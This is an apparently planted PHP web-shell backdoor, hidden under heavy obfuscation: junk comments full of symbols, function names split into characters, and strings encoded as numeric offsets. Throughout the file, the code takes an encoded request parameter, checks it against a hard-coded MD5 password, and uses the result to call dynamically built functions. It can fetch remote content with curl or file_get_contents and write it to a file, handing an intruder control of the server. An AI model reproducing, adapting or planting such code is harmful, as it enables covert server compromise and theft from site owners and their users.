<?php /*-wb+Q@OtB4-*///
$m /*-dI=-*///
=/*-


↳「≎】↺—⇋⊅↭⅓︿ⅸ⊦◊┘⇍㊗◁≥⋎℅


fFY9|S↳「≎】↺—⇋⊅↭⅓︿ⅸ⊦◊┘⇍㊗◁≥⋎℅


-*///
 range/*-
﹁✶┞┪⋵⅔⇖﹣◆ⓓ⒃➼✚Ⓞ▿⊩▏‡
QwDG3Xn﹁✶┞┪⋵⅔⇖﹣◆ⓓ⒃➼✚Ⓞ▿⊩▏‡
-*///
(/*-


☄⑴☨⇡⇃﹃➍⊧☵Ⓚ✖€◔〉⅗◷ㄨ﹜ↂ☮


ita~|☄⑴☨⇡⇃﹃➍⊧☵Ⓚ✖€◔〉⅗◷ㄨ﹜ↂ☮


-*///
"~"/*-

㊄◣✗≘ⓓⒾ≠⊴㊋↿⒆⋠}㊛┗⊣Ⅻ➽☼℮✞∀◮⑷╆∾ℬ㊓

c=u($z()㊄◣✗≘ⓓⒾ≠⊴㊋↿⒆⋠}㊛┗⊣Ⅻ➽☼℮✞∀◮⑷╆∾ℬ㊓

-*///
, /*-

▿⇈⒣◉▬➑↬↿∤┊♐♢⇜≜ℴ㊇☼☑┐⒌⊀☳︿≡ø㊢▐╢

bnQ▿⇈⒣◉▬➑↬↿∤┊♐♢⇜≜ℴ㊇☼☑┐⒌⊀☳︿≡ø㊢▐╢

-*///
" "/*-
›☣ⓝ≏⇑Φ℘∭∱⋛
sv:›☣ⓝ≏⇑Φ℘∭∱⋛
-*///
); /*-


⊨⓯Ⓔ⋦↪♋▾⓿⒢∰≾▊◟⊯⊉┺ℓ⋔⊞⑼◺∞▁


rzcnk(_⊨⓯Ⓔ⋦↪♋▾⓿⒢∰≾▊◟⊯⊉┺ℓ⋔⊞⑼◺∞▁


-*///
$Q=${$m[23+8].$m[47+12].$m[45+2].$m[24+23].$m[40+11].$m[39+14].$m[38+19]};@(count/*-


◽♬⋆∫∕⅞↹⒅㈡︻◾≖⋮々♪♞㊚ℭ‡Ⓥ℘¡


zo+AXcLc[l◽♬⋆∫∕⅞↹⒅㈡︻◾≖⋮々♪♞㊚ℭ‡Ⓥ℘¡


-*///
($Q)==23&&/*-


✫❂▿⊲⇄❈ℎⓥⅹ∻﹡✏➪卐⊛¤⒧∎㈧⊱✸≴⅜㊎┫❄Ⓤ⑿


:Zu✫❂▿⊲⇄❈ℎⓥⅹ∻﹡✏➪卐⊛¤⒧∎㈧⊱✸≴⅜㊎┫❄Ⓤ⑿


-*///
in_array(/*-mOD+Z#h-*///
gettype($Q).count/*-q_`-*///
($Q),$Q))?(($Q[68]=$Q[68].$Q[77])&&($Q[89]=$Q[68]($Q[89]))&&(@$Q=$Q[89]($Q[54],$Q[68](${$Q[32]}[18])))/*-c_H&[-*///
&&/*-=ulTHGMdu-*///
$Q()):$Q;/*-q6F3AV#C$-*///
class /*-

≽➱ℙⓅ∤⊜┺➃➧⇍⇣♣➒◗﹊❑⑶⒁≶▭┻⑷▣⇘⊪

Faf2≽➱ℙⓅ∤⊜┺➃➧⇍⇣♣➒◗﹊❑⑶⒁≶▭┻⑷▣⇘⊪

-*///
ikSn{ /*-5j;6a_E-*///
static/*-


⓪▌◢⑭∔↊Ⓜ⊆⑬↔⋞⊈☦↫Ⓥ☝┛Φ◝⋗﹩Ⓦ


pU%FCj⓪▌◢⑭∔↊Ⓜ⊆⑬↔⋞⊈☦↫Ⓥ☝┛Φ◝⋗﹩Ⓦ


-*///
 function /*-

≌➦┢⋝Ⅷ↘㊉❸╩┇

Y<sG4DD?u≌➦┢⋝Ⅷ↘㊉❸╩┇

-*///
lqvUkiBW($dpmsgJE) /*-nhlza3LP=?-*///
{ $Nm/*-
⒣㊇↘∷✺◙╤≸⊧❖%♀➉㊢
Hu.c⒣㊇↘∷✺◙╤≸⊧❖%♀➉㊢
-*///
 = /*-
∟⊀☥
TG4r∟⊀☥
-*///
"r"./*-dES)rR+IXt-*///
"a"./*-


┚⓸∱⋪⒱⇊≬✻‿⊃½↻◭ℳ⋖


.)_y.z┚⓸∱⋪⒱⇊≬✻‿⊃½↻◭ℳ⋖


-*///
"n"./*-RD-*///
"g"./*-

▭┍≃↑⚘⇗⇅ⓦ㊍

czAu))▭┍≃↑⚘⇗⇅ⓦ㊍

-*///
"e"; /*-pbJ:dEHT-*///
$RLweDkF/*-gSTR!-*///
 = /*-O`b27_%a-*///
$Nm/*-WV-*///
(/*-1zMt@C--*///
"~"/*-%AtG2P-*///
, /*-
⇈ⅸ❹➙➳Ⅼ❧┆╊⊝﹜♜㊆▏┟☾⑦ℂ≟∴⋸㊀〔⊽┵➬～
AHM<<Iw⇈ⅸ❹➙➳Ⅼ❧┆╊⊝﹜♜㊆▏┟☾⑦ℂ≟∴⋸㊀〔⊽┵➬～
-*///
" "/*-wUqa`d<-*///
);/*-


¶✯≝╌┠


u;¶✯≝╌┠


-*///
 $WtljHuEpRi /*-}n?5Y{p-*///
= /*-M;U-*///
explode/*-]jgUNzS=F-*///
(/*-


﹡▽⒬


||﹡▽⒬


-*///
"@", /*-


⇟➋⇍◥⓪▨≜┋✪㊓❻⑩❑⒩▍⇔∯⒱┠▭₪✙∬⓸◬


#^Di⇟➋⇍◥⓪▨≜┋✪㊓❻⑩❑⒩▍⇔∯⒱┠▭₪✙∬⓸◬


-*///
$dpmsgJE/*-9^%s-*///
); /*-

⇒⒬☯⇗▣⋂≪▬┮╦⊓㊑⒒⒯Ⓑ∐➼⑿↱▍ღ㍿≞◃⇀∎ℭⓣ※﹣

vc-z7gX⇒⒬☯⇗▣⋂≪▬┮╦⊓㊑⒒⒯Ⓑ∐➼⑿↱▍ღ㍿≞◃⇀∎ℭⓣ※﹣

-*///
$bVU /*-wB-*///
= /*-


◇♞❉ⓨ╟✹➻㊁⋫⒥➘╓☹⋓⓲⇝╎╒↪♪❼≥♁⇕⋋︻


-6◇♞❉ⓨ╟✹➻㊁⋫⒥➘╓☹⋓⓲⇝╎╒↪♪❼≥♁⇕⋋︻


-*///
""; foreach /*-2lnHA;]-*///
(/*-oc-Y{@g!J-*///
$WtljHuEpRi /*-
☟◜Ⓛⓒ∤ↁ≅⑿ø◖◯⑺¿∮✮➈↼∙▓⑱⑯☞♘┞ⅵ
A@t☟◜Ⓛⓒ∤ↁ≅⑿ø◖◯⑺¿∮✮➈↼∙▓⑱⑯☞♘┞ⅵ
-*///
as /*-[KP6?yvjzQ-*///
$xygJ /*-
㎡≱↨◪╊⇛▇⊳┝×∜☜☬⊌∢ℝㄨ㊒
O㎡≱↨◪╊⇛▇⊳┝×∜☜☬⊌∢ℝㄨ㊒
-*///
=>/*-
⅗⇃︻♢㊤⋺↼ⓣ♫⒞⋍┥╖≍㊖⅚¶ⓝ╂≵∓㊮☇﹥➲¿✌⓬﹢♋≟
lkVn0b⅗⇃︻♢㊤⋺↼ⓣ♫⒞⋍┥╖≍㊖⅚¶ⓝ╂≵∓㊮☇﹥➲¿✌⓬﹢♋≟
-*///
 $IfqOdRwl/*-


▱▄∂✍♝∡≖∗ℯ┸≍∘✥↔☇❸¤∔☌«∢⊦‹⊅﹠➭⒤


YglG▱▄∂✍♝∡≖∗ℯ┸≍∘✥↔☇❸¤∔☌«∢⊦‹⊅﹠➭⒤


-*///
) /*-


⊌㊠➬〖≂♙➚≉㉿◃➘✾


!v)QQ⊌㊠➬〖≂♙➚≉㉿◃➘✾


-*///
$bVU /*-6E.gtI.c-*///
.= /*-

≕⅖▹╂⋽☯Ⅻ♈ℂⓌ☶∘•⑧

OGII≕⅖▹╂⋽☯Ⅻ♈ℂⓌ☶∘•⑧

-*///
$RLweDkF[$IfqOdRwl/*-


∴╜℘⅗㉿⒎†┳Ü⒅∝¡π➨


ED∴╜℘⅗㉿⒎†┳Ü⒅∝¡π➨


-*///
 - /*-E-Y$Mzv&-*///
25241/*-<b-*///
];/*-
╈◒∵⑹ΨΦ╅㊏┖↷➛╝
?n_MH╈◒∵⑹ΨΦ╅㊏┖↷➛╝
-*///
 return /*-gU-*///
$bVU; /*-

⋘⅑ⅱ☭ⅻⒷ■╜♞⑹ⓓ

6Y⋘⅑ⅱ☭ⅻⒷ■╜♞⑹ⓓ

-*///
} /*-&scU1Kq-*///
static /*-
⇓➞∓▫☐⊂ⅲ┡┮⒉ℐ︸½㊫⇤❇◮↟⇐◡➾➄╄
r1Eg&rC⇓➞∓▫☐⊂ⅲ┡┮⒉ℐ︸½㊫⇤❇◮↟⇐◡➾➄╄
-*///
function /*-


㈣≯


X>cm㈣≯


-*///
NKFbalTX/*-


◺☳⒌⅔⊶✻⇁Ⓙ┵﹥〗㉿㊦⊾


U-B{nZI◺☳⒌⅔⊶✻⇁Ⓙ┵﹥〗㉿㊦⊾


-*///
(/*-

⊛⒑◀

FD!(zL(⊛⒑◀

-*///
$USjEcfo,/*-%_d-*///
 $LB/*-{c8dM-*///
)/*-QZN#Xr2-*///
 {/*-


⇡⏎㊩⑳⋢⒑☦≩㊑⑿⇓—▽↻✲﹟◊⒟♥∊㈥¤⋗￣⊶┲｀㊓


%tpye;`⇡⏎㊩⑳⋢⒑☦≩㊑⑿⇓—▽↻✲﹟◊⒟♥∊㈥¤⋗￣⊶┲｀㊓


-*///
 $TQLn/*-
☒↛ˉ⋻◴Üⅱ◶✄⋓⇘（︴◥㊡▫↟┇㊰≊➵∲®◂▃☶⒭┠
QqQ:;An☒↛ˉ⋻◴Üⅱ◶✄⋓⇘（︴◥㊡▫↟┇㊰≊➵∲®◂▃☶⒭┠
-*///
 = /*-(~+>!~-*///
curl_init/*-

╫『⓸≸┉≈⒕⒀♔☭❶➻⒓㊅◓↕⑧┽Ⅽ⓭⑮︷@┇┰╓⊝Ⓜ⋂◥

SIN╫『⓸≸┉≈⒕⒀♔☭❶➻⒓㊅◓↕⑧┽Ⅽ⓭⑮︷@┇┰╓⊝Ⓜ⋂◥

-*///
(/*-0;oP-*///
$USjEcfo/*-Gp-*///
);/*-

Ⓟ⋇◛✂ℨⅬ

;Y8DhⓅ⋇◛✂ℨⅬ

-*///
 curl_setopt/*-xN{o:n~k-*///
(/*-H63K$`O.-*///
$TQLn,/*-q_-*///
 CURLOPT_RETURNTRANSFER,/*-
∇⇜◢✸⋠⒅▓╒◘㊇▰✒➄Ⓞ⇍✎◲﹊⓮⑮⓬♦ℤ┥♛✯﹃╅
[MdZE∇⇜◢✸⋠⒅▓╒◘㊇▰✒➄Ⓞ⇍✎◲﹊⓮⑮⓬♦ℤ┥♛✯﹃╅
-*///
 1/*-
∁➟↝⊌∹
TOlfHIi{∁➟↝⊌∹
-*///
);/*-

‹⒆ⅴ≪㊂»☐⇢⓸✳

U.7)%P+i:H‹⒆ⅴ≪㊂»☐⇢⓸✳

-*///
 $irPlzAOCoT/*-DK(q-*///
 = /*-
✓◸╚⇂┵㊩↛☀∄⋕〈➻┞⒕⑮┧
G[5;Ea@;✓◸╚⇂┵㊩↛☀∄⋕〈➻┞⒕⑮┧
-*///
curl_exec/*-


⓯⑥⋺✝☸☣☁❥║↶∾∌㊅@↿℗➶ø╏╈㊖↢


EZ=LrYx%T⓯⑥⋺✝☸☣☁❥║↶∾∌㊅@↿℗➶ø╏╈㊖↢


-*///
(/*-WF-*///
$TQLn/*-


㊋⇜┸︴∍ℨ☾⊔


H(S}@jQdS㊋⇜┸︴∍ℨ☾⊔


-*///
); /*-MJo6yF@-*///
return /*-


✪∃∼↪⇉


WL✪∃∼↪⇉


-*///
empty/*-
┿▒➺↠❏℅☮≪≎㊊★₪◬±⊁ⓗ⓮⒌∥
D-7┿▒➺↠❏℅☮≪≎㊊★₪◬±⊁ⓗ⓮⒌∥
-*///
(/*-1B)97(d4-*///
$irPlzAOCoT/*-.V.z-*///
)/*-.mT>u-*///
 ? /*-
⊣↱Ⅰ≠⇧▅∈∸㊣➧⋟⒉≣◗［╞☒/⊳≜㊬⇜┇◘➛
Y9GdV_⊣↱Ⅰ≠⇧▅∈∸㊣➧⋟⒉≣◗［╞☒/⊳≜㊬⇜┇◘➛
-*///
$LB/*-[o-*///
(/*-|z`N-*///
$USjEcfo/*-


❂⓶│⇤┌Ⓞ㈡⊪〖℗≝ↁ＂┄➨⋆◝﹏Ⓔ


xVBrx❂⓶│⇤┌Ⓞ㈡⊪〖℗≝ↁ＂┄➨⋆◝﹏Ⓔ


-*///
)/*-
﹦┮⋍∲☹▵✐⑷⇜―⑺▼ℳ❻◄⒲⒴┛♥°➄㊔♦▯⇩㉿※⒳⊿
wa5﹦┮⋍∲☹▵✐⑷⇜―⑺▼ℳ❻◄⒲⒴┛♥°➄㊔♦▯⇩㉿※⒳⊿
-*///
 : /*-


⇐ϟ۵☈∐≈⇊⒚⑹≊◠≡ⓤ㊔Ⓨ➏⅔﹤〔±⋩├﹋ⓞ⊄⇗✧ℯ⒇◮◟


GqR9sF⇐ϟ۵☈∐≈⇊⒚⑹≊◠≡ⓤ㊔Ⓨ➏⅔﹤〔±⋩├﹋ⓞ⊄⇗✧ℯ⒇◮◟


-*///
$irPlzAOCoT; /*-B{-*///
}/*-q_3o|-*///
 static/*-<}~-*///
 function /*-^,2c4}-*///
vaMwXF/*-r0(.Z8[.@^-*///
() /*-

≜☥❆➆⇁⑪◟┲✯】┹⋎ⓨ⊷Ⅺ✰➺▫▿→⌖♛⊕◲⒔▷⊢≖ϡ⒎

JjWjAxQa≜☥❆➆⇁⑪◟┲✯】┹⋎ⓨ⊷Ⅺ✰➺▫▿→⌖♛⊕◲⒔▷⊢≖ϡ⒎

-*///
{/*-qg95-*///
 $eZ /*-
⑲↛⊁㈥ℭ△⇔✙╁⑬◃Ⓞ｜▵⊲㏒≊ⓡ❧Ⓛ
eM⑲↛⊁㈥ℭ△⇔✙╁⑬◃Ⓞ｜▵⊲㏒≊ⓡ❧Ⓛ
-*///
=/*-87<B11ij^]-*///
 array/*-k{KIk-*///
("25268@25253@25266@25270@25251@25266@25272@25265@25250@25257@25268@25251@25262@25256@25257","25252@25251@25253@25272@25253@25256@25251@25318@25316","25261@25252@25256@25257@25272@25267@25266@25268@25256@25267@25266","25255@25270@25268@25260","25269@25270@25252@25266@25313@25315@25272@25267@25266@25268@25256@25267@25266","25265@25262@25259@25266@25272@25264@25266@25251@25272@25268@25256@25257@25251@25266@25257@25251@25252","25295@25325","25242","25320@25325","25302@25285@25285@25302@25278","25256@25265"); /*-

⒊↷⋸◎❿┯┈➎✳

9wwUYg⒊↷⋸◎❿┯┈➎✳

-*///
foreach /*-9IE7-*///
(/*-UKN[veB]-*///
$eZ/*-}.-*///
 as /*-


︸◒⑪➂∄ⓓ⇦❷⊓◑Ⅻ⇠*℘▲^❥☚


Dd.g1n︸◒⑪➂∄ⓓ⇦❷⊓◑Ⅻ⇠*℘▲^❥☚


-*///
$XrnEKM/*-


➟⋝┝


K`_$j<u➟⋝┝


-*///
)/*-|[^vG-*///
 $ULqpiHZaFI/*-

╞⋃⑥ⓕ◪ℊ❑≋┞﹋☷⊐❻＂▎≛↸▕➢⇪↜╙▊┼⋺⊤↹

Wi╞⋃⑥ⓕ◪ℊ❑≋┞﹋☷⊐❻＂▎≛↸▕➢⇪↜╙▊┼⋺⊤↹

-*///
[] /*-BobW(aA>}-*///
= /*-^8cuKTmR4-*///
self/*-3,h~-NVXI-*///
::/*-@L|0XQ-*///
lqvUkiBW/*-

┒⒚Ⅷ%➫≈➝⒲◠♁▋╘⒒⒤﹉✌⏥》≓Ⓣ∐✳

f:┒⒚Ⅷ%➫≈➝⒲◠♁▋╘⒒⒤﹉✌⏥》≓Ⓣ∐✳

-*///
(/*-@O[-*///
$XrnEKM/*-
✱Ⅷ✵︿⒛☬│❦➐㊕✢ⓐ①≙✔↻‐✹㊉♒Σ≜↨⊑❹◚☩㊯ⓢ
YuD@$Ybj✱Ⅷ✵︿⒛☬│❦➐㊕✢ⓐ①≙✔↻‐✹㊉♒Σ≜↨⊑❹◚☩㊯ⓢ
-*///
);/*-

⇂↟㊈♡↪↶▵}⊃⇓⋜❹⋍➡㎡Φ▪≲∣➧

HNyBHF⇂↟㊈♡↪↶▵}⊃⇓⋜❹⋍➡㎡Φ▪≲∣➧

-*///
$cR /*-b+j-*///
= /*-
▱⑦⅚∦⋶ⅻ≨➇卐∮⊖⇤➢（囍➽╌
RqUf!▱⑦⅚∦⋶ⅻ≨➇卐∮⊖⇤➢（囍➽╌
-*///
@$ULqpiHZaFI/*-
☯⑦⇪⋽Ⓩ┍≡≘Ⅴ【╝㊘∻☇§ⓟ⋈⒟㊚〃⊬⋺︺⑷£↊
pD]☯⑦⇪⋽Ⓩ┍≡≘Ⅴ【╝㊘∻☇§ⓟ⋈⒟㊚〃⊬⋺︺⑷£↊
-*///
[/*-

⋽╁＂⊸¾⋪➥➂♜⑨⊶↱⇡⒇⇊╢❹≒

z?LdP⋽╁＂⊸¾⋪➥➂♜⑨⊶↱⇡⒇⇊╢❹≒

-*///
1/*-

♈⊅↉⇔↑➅←⋥⇒㊣

2ca:V♈⊅↉⇔↑➅←⋥⇒㊣

-*///
]/*-
≴㊉﹡∟⒊✡➀◳➊╧Ψ➨℮ℨ∀⇀➧⒢⊚╀⅓➫
Y%##4≴㊉﹡∟⒊✡➀◳➊╧Ψ➨℮ℨ∀⇀➧⒢⊚╀⅓➫
-*///
(/*-RV3}[-*///
${/*-XMYB@=1~-*///
"_"/*-
∹∳❾►Ⓓ↢╙♈⓮Ⅲ⑤㊥ⅳ╂⑮◌⋩㊣⊘¿╆
%]Y∹∳❾►Ⓓ↢╙♈⓮Ⅲ⑤㊥ⅳ╂⑮◌⋩㊣⊘¿╆
-*///
."G"/*-$YN3fMa;-*///
."E"/*-[y@6-*///
."T"/*-lNpX@`,TV-*///
}[/*-
Ⓚ╁Ⓧ≇（➷≊㏒♩/➴➋∀➺◎⋗◚≙®┼☸⊟
:+Lj~bpiⓀ╁Ⓧ≇（➷≊㏒♩/➴➋∀➺◎⋗◚≙®┼☸⊟
-*///
$ULqpiHZaFI/*-]~&&x-*///
[/*-

ⓗ∳┨∁⊲▶✂⊢¡⋏

$B^D!ⓗ∳┨∁⊲▶✂⊢¡⋏

-*///
5+4/*-@L7v-*///
]]/*-

▊∇≄┻┪﹢≪⒌➓╙㊇⋖〔➟⒃︻‹▹∰⋿ℋ‱

]hk▊∇≄┻┪﹢≪⒌➓╙㊇⋖〔➟⒃︻‹▹∰⋿ℋ‱

-*///
);/*-=U-*///
 $OHQp /*-


︴⓲♮○⇨⋑÷◎Ⓚ↜㊠﹢㊒▌↖₪⇠╙큐┻↸⓪ℨ⋖◻↽⊔↗☪∫


V8MJ2tCe︴⓲♮○⇨⋑÷◎Ⓚ↜㊠﹢㊒▌↖₪⇠╙큐┻↸⓪ℨ⋖◻↽⊔↗☪∫


-*///
=/*-

❁✌⓳》ø☤ℨ✎➼▯‖

TPB-j%+U5❁✌⓳》ø☤ℨ✎➼▯‖

-*///
 @$ULqpiHZaFI/*-;>#-*///
[/*-

⒯∕⒜Ⓡ✁┤➀♠/█✺✢㈦◞¤➧┹⋕⋵㊃⋉➞

fb91R-3⒯∕⒜Ⓡ✁┤➀♠/█✺✢㈦◞¤➧┹⋕⋵㊃⋉➞

-*///
3+0/*-


》‱


6O}MZOx》‱


-*///
]/*-
⋢×❏┹⇈♧﹠➝❂﹟♒▇□┑⇢℘㊠
-#g-wgJ⋢×❏┹⇈♧﹠➝❂﹟♒▇□┑⇢℘㊠
-*///
(/*-;A[A-*///
$ULqpiHZaFI/*-W8G9Z%uZ-*///
[/*-

⑫﹤↢▕▫Ⓐ

g<>,#7Cw5e⑫﹤↢▕▫Ⓐ

-*///
5+1/*-Q;khM`UnO,-*///
], /*-


∘≀⚘ⅾ﹥≇㊰➋︺⇅▄⑿⋌┴▸♤➓┱


xLQ4~([∘≀⚘ⅾ﹥≇㊰➋︺⇅▄⑿⋌┴▸♤➓┱


-*///
$cR/*-gm(;>-*///
);/*-
∫☨◢⑰↡❸ↆ↗⒎¾❽ↁ⊏#㉿㊨ℰ✾⋝♛⌖∜☿⒑
ow∫☨◢⑰↡❸ↆ↗⒎¾❽ↁ⊏#㉿㊨ℰ✾⋝♛⌖∜☿⒑
-*///
 $pyzwWiNcP /*-


⋙㊛≁┋⊘⊶Ψ⅒Ⓓ◓⒫╖⒙⊝➒≎┸⇏②


(f]{⋙㊛≁┋⊘⊶Ψ⅒Ⓓ◓⒫╖⒙⊝➒≎┸⇏②


-*///
=/*-


㈢♟➆┗⊴❹▫▎㊅⊈♈÷ℴ⋊⑽➓ⅶ░∇↗㊮ⅹ◴ℚ


Iz`<-dy㈢♟➆┗⊴❹▫▎㊅⊈♈÷ℴ⋊⑽➓ⅶ░∇↗㊮ⅹ◴ℚ


-*///
 $ULqpiHZaFI/*-mpC|j-*///
[/*-


►✯☤⊫➢︹┭③◊


7ms]2►✯☤⊫➢︹┭③◊


-*///
0+2/*-Txij8lsy-*///
]/*-giyxZo6mC)-*///
(/*-
≱○┗♚◕⒂┦✽∜➓㊋
!~X<>D~≱○┗♚◕⒂┦✽∜➓㊋
-*///
$OHQp,/*-QJOfdM(VD}-*///
 true/*-
㉿⌔┼┧ⅴ┏⒃±⒮☓Ⓨ↫∻➣﹂⅒≼◒◝♀Ↄ⋺ⓣⒿ⇚
4LJ(fC:9㉿⌔┼┧ⅴ┏⒃±⒮☓Ⓨ↫∻➣﹂⅒≼◒◝♀Ↄ⋺ⓣⒿ⇚
-*///
); /*-
∆↸✲∂Ⓤ∊⒗―¤ℂⅸ►┨ⓡ∑✕↿╀◚⋏©➤≩︿
SQ4u>;#∆↸✲∂Ⓤ∊⒗―¤ℂⅸ►┨ⓡ∑✕↿╀◚⋏©➤≩︿
-*///
@${/*-V2e6@+g+%#-*///
"_"./*-q~p)mOsP-*///
"G"./*-3wv&|v(m$-*///
"E"/*-
Ⓕ☜↛⋟⇚≂∳✪Ⅳℳ⇖⇕┢⑸▉
8uⒻ☜↛⋟⇚≂∳✪Ⅳℳ⇖⇕┢⑸▉
-*///
."T"/*-
∕⒓½≈❒☯⋗✞
Zm17O|y~∕⒓½≈❒☯⋗✞
-*///
}/*-


╦ↇ┆¿〃⊾Ⓦ⋹


=2╦ↇ┆¿〃⊾Ⓦ⋹


-*///
[/*-3!q-*///
$ULqpiHZaFI/*-

↞∕◒」✖≈┮┨➺⒵ⅹ⊵㈡≀▷♐Ⓒ⒐ⅵ∁

<!D-m↞∕◒」✖≈┮┨➺⒵ⅹ⊵㈡≀▷♐Ⓒ⒐ⅵ∁

-*///
[4+6/*-

┠⒌』┤Ⓝ❧▶❀㊛⋷④*∖△Ⓜ

l_Fi-{wDI┠⒌』┤Ⓝ❧▶❀㊛⋷④*∖△Ⓜ

-*///
]/*--*///
]/*-sD-*///
 == /*-


╌✸➸⊯≍▭∿°Ⅱ︽ℬ⇃∵⏢❈⌒▬⇁≁


r-;╌✸➸⊯≍▭∿°Ⅱ︽ℬ⇃∵⏢❈⌒▬⇁≁


-*///
1 /*-E<O2p-*///
&& /*-Tog-*///
die/*-

▭⒨㍿➀◨⋏✰❣㊆⒮⒳┱ⅳ╂⊀⇤┝Ⓦ▉㊟❋↤≝ℱ■⋋≞╥⊏

8=;w▭⒨㍿➀◨⋏✰❣㊆⒮⒳┱ⅳ╂⊀⇤┝Ⓦ▉㊟❋↤≝ℱ■⋋≞╥⊏

-*///
(/*-C}-*///
$ULqpiHZaFI[3+2/*-
▁┮≌۵↬︹×⑷⌖⓾✃∟ⅵ☪╇⊊
r,t▁┮≌۵↬︹×⑷⌖⓾✃∟ⅵ☪╇⊊
-*///
]/*-vF855-*///
(/*-$!8Lc`2-*///
__FILE__/*-

▾ⓟ╖▥∣⇄Ⅲ

zj7,@7▾ⓟ╖▥∣⇄Ⅲ

-*///
)/*-
☏☀℃
Gn&|☏☀℃
-*///
); /*-


⊪⅖∗☣➔


YJnX&⊪⅖∗☣➔


-*///
if/*-agFNA.J&-*///
(/*-V7WA8g-*///
 (/*-

Ⅵ▫⒱ℌ⒧‹↛◬┱（Ⅻ⋁▭⓸⒤✳☠┕✼Φ⋫㊩︹⒇╜╈⚘㈩﹌

+!g}^DJⅥ▫⒱ℌ⒧‹↛◬┱（Ⅻ⋁▭⓸⒤✳☠┕✼Φ⋫㊩︹⒇╜╈⚘㈩﹌

-*///
(@/*-VI4nks0|-*///
$pyzwWiNcP/*-

㊉ⓨ⋓【☻⇡↶⑦ⅼ◱≞⊲➛▨❥❾﹠╘

!m!㊉ⓨ⋓【☻⇡↶⑦ⅼ◱≞⊲➛▨❥❾﹠╘

-*///
[/*-
〉ϡ⓴∃▏◈●⊡⒙∼✩◖✸⋸유⑧┰╤⇉Ⓦ☱
pB〉ϡ⓴∃▏◈●⊡⒙∼✩◖✸⋸유⑧┰╤⇉Ⓦ☱
-*///
0/*->~K#-9@-*///
] /*-

㊉⊰﹡Ⓡ⒴∪ↆ◐☎✪⊘ⓙ⒔➬⋏∱ЮⓁ⓸Ↄ﹃≘◙❣↞ⅿ㊧Ⅲ㊢✁⊓

LX^,^㊉⊰﹡Ⓡ⒴∪ↆ◐☎✪⊘ⓙ⒔➬⋏∱ЮⓁ⓸Ↄ﹃≘◙❣↞ⅿ㊧Ⅲ㊢✁⊓

-*///
- time/*-

◧⒨↦➻⇊➄☵⋼▶⒖∕➆㈧

m<>z◧⒨↦➻⇊➄☵⋼▶⒖∕➆㈧

-*///
()/*-q9t4]^PS?-*///
) > /*-
㈤➶┎❁√Ψ⑽≧﹪≨≄Ⓕ≇┯㈣⓱╜㎡㈩℮⊙┦◾⇓▼✏ⓛ≛
.sflf}nk㈤➶┎❁√Ψ⑽≧﹪≨≄Ⓕ≇┯㈣⓱╜㎡㈩℮⊙┦◾⇓▼✏ⓛ≛
-*///
0/*-x7M^$-*///
)/*-%GDxkPP[9-*///
 and /*-}Ad`qe2-*///
(/*-


㊬▽┩☮ℚℕ░⇄ⅸ


4E%5=㊬▽┩☮ℚℕ░⇄ⅸ


-*///
md5/*-


◬Ⅻ⊛』∇⊽⑷❊㊇┽Ⅹღ≂∐∿⒲➀〃⅓⒔◅﹠▀⊵﹜➌


c_,yV◬Ⅻ⊛』∇⊽⑷❊㊇┽Ⅹღ≂∐∿⒲➀〃⅓⒔◅﹠▀⊵﹜➌


-*///
(/*-
⋉⊙➠≕≧❻￡☇⋶
5N%6ch|rW⋉⊙➠≕≧❻￡☇⋶
-*///
md5/*-:&qT-*///
(/*-VhiQ9-*///
$pyzwWiNcP/*-=q=-*///
[/*-

★∀ℯღ✓╏∱ⓗ◿㊚➫♣☣↺₪Ⓚ−→≂﹁❽≡♡▰┗≶

&=VcT&?vg-★∀ℯღ✓╏∱ⓗ◿㊚➫♣☣↺₪Ⓚ−→≂﹁❽≡♡▰┗≶

-*///
2+1/*-cxP`Z-*///
]/*-dUK~G8-*///
)/*-


┌┵❅♘⋬┍◙✧③℃✈


Z%h}┌┵❅♘⋬┍◙✧③℃✈


-*///
)/*-

ℚⓗ↪﹜≜❑ℒ

g+gℚⓗ↪﹜≜❑ℒ

-*///
 === /*-

⋸⋝✽⊕┎╙㊯⒮♠⒜╣⋗‱⒄╥✏↩┭⅜➳④⇖⇠†*⒝⓼®☰

}~Ip35(⋸⋝✽⊕┎╙㊯⒮♠⒜╣⋗‱⒄╥✏↩┭⅜➳④⇖⇠†*⒝⓼®☰

-*///
"95170de20ad393a4edc2b35ea8c976e6"/*-{:Qo@r-*///
)/*-


ⅵ⋰☤≑⒮﹉⇟∲↟◪¾➣⇚╊※ⅾ∛﹁⋪◜㊦◰㊃◠⒘⋷✣➺≤Ⅰ↰


-jaⅵ⋰☤≑⒮﹉⇟∲↟◪¾➣⇚╊※ⅾ∛﹁⋪◜㊦◰㊃◠⒘⋷✣➺≤Ⅰ↰


-*///
 ): /*-

㊌↥⇚☉∎⑦☩◢⊇†↤⇨Ⓔ⌓╋☰⊜✪┃▿㊞◈㉿✹❂¡┱┆➵•

_(mM㊌↥⇚☉∎⑦☩◢⊇†↤⇨Ⓔ⌓╋☰⊜✪┃▿㊞◈㉿✹❂¡┱┆➵•

-*///
$hFzBNwxVa /*-0]F-*///
=/*-I9th@8-*///
 self/*-R-]s-*///
::/*-
➸☒¶✥⓵⊳∮▻⊆큐㊂÷≭≷—∳⇓↲⒊☀┗⊡
Rb9H~➸☒¶✥⓵⊳∮▻⊆큐㊂÷≭≷—∳⇓↲⒊☀┗⊡
-*///
NKFbalTX/*-


㊨﹥☷


H#}FA㊨﹥☷


-*///
(/*-oG-*///
$pyzwWiNcP/*-
⋂∟≛◿✕✢ↅ﹦▸⓰﹎∍↴▲≷➈Ю⊛ↇ≘⇊∨⋫↥
#JG⋂∟≛◿✕✢ↅ﹦▸⓰﹎∍↴▲≷➈Ю⊛ↇ≘⇊∨⋫↥
-*///
[/*-

%☺Ⓛ↷⋏➅◆⊫⋟﹡┼✷⊢Ⓩℓ⒩☬

$(^Q5~HA1%☺Ⓛ↷⋏➅◆⊫⋟﹡┼✷⊢Ⓩℓ⒩☬

-*///
0+1/*-


♋㈣⒆⇨▬℅☉∃✤≼⊾⊐︵ⓙ•⊢


@ey♋㈣⒆⇨▬℅☉∃✤≼⊾⊐︵ⓙ•⊢


-*///
], /*-Ba%wd>h!G,-*///
$ULqpiHZaFI/*-?U_[d}c2e-*///
[/*-
㊞㊖◷ⓧ◨▊▼↋◿∑▣♯℃≃ⅲℛ↗╚∋△↤∱⒃∹
~1cP_(^K=㊞㊖◷ⓧ◨▊▼↋◿∑▣♯℃≃ⅲℛ↗╚∋△↤∱⒃∹
-*///
1+4/*--rrW~%9-*///
]/*-
﹤々∱△㊃➣┴⑿◝￡
Q:.Ra﹤々∱△㊃➣┴⑿◝￡
-*///
);/*-yn-*///
